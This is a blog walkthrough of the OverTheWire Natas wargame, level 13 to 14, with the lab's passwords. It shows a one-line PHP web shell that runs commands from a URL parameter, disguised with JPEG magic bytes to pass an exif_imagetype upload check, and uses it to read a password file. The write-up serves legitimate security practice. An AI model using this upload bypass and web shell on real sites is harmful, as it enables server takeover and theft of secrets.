Natas · OverTheWire

Natas Level 13 → Level 14

Level 13

Username : natas13
Password : jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY
URL : http://natas13.natas.labs.overthewire.org

Solution

To solve this level, we first log into the natas13 application using the credentials provided above.
The application looks very similar to the previous level, however, the application this time around is checking for the filetype with the exif_imagetype function. According to the PHP manual, the exif_imagetype function determines the type of an image by reading the first bytes of an image and checking its signature.
As the function relies on the first bytes of image and checking its signature, if we can create a file and use the same ‘ magic numbers ‘ that the function is expecting, we should be able to bypass the check. A quick Wikipedia search yields 0xFF 0xD8 0xFF 0xE8 as the magic. Therefore, we create a new php file with the magic numbers in the beginning. I used python to create the following shell file. Apart from the first 4 bytes, the rest of the file is exactly the same as before.

>> shell=open('shell.php','w')
>>> shell.write('\xFF\xD8\xFF\xE0' + '<?php $output = shell_exec($_GET["cmd"]); echo "<pre>$output</pre>"; ?>')
>>> shell.close()

Once again, we upload this php file by intercepting the request in Burp and changing the name of the file with a .php extension. Navigate to the URL generated by the application and append ‘ ?cmd=cat%20/etc/natas_webpass/natas14 ‘ and the application prints the password for the next level.

 

Level 14

Username : natas14
Password : Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1
URL : http://natas14.natas.labs.overthewire.org

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s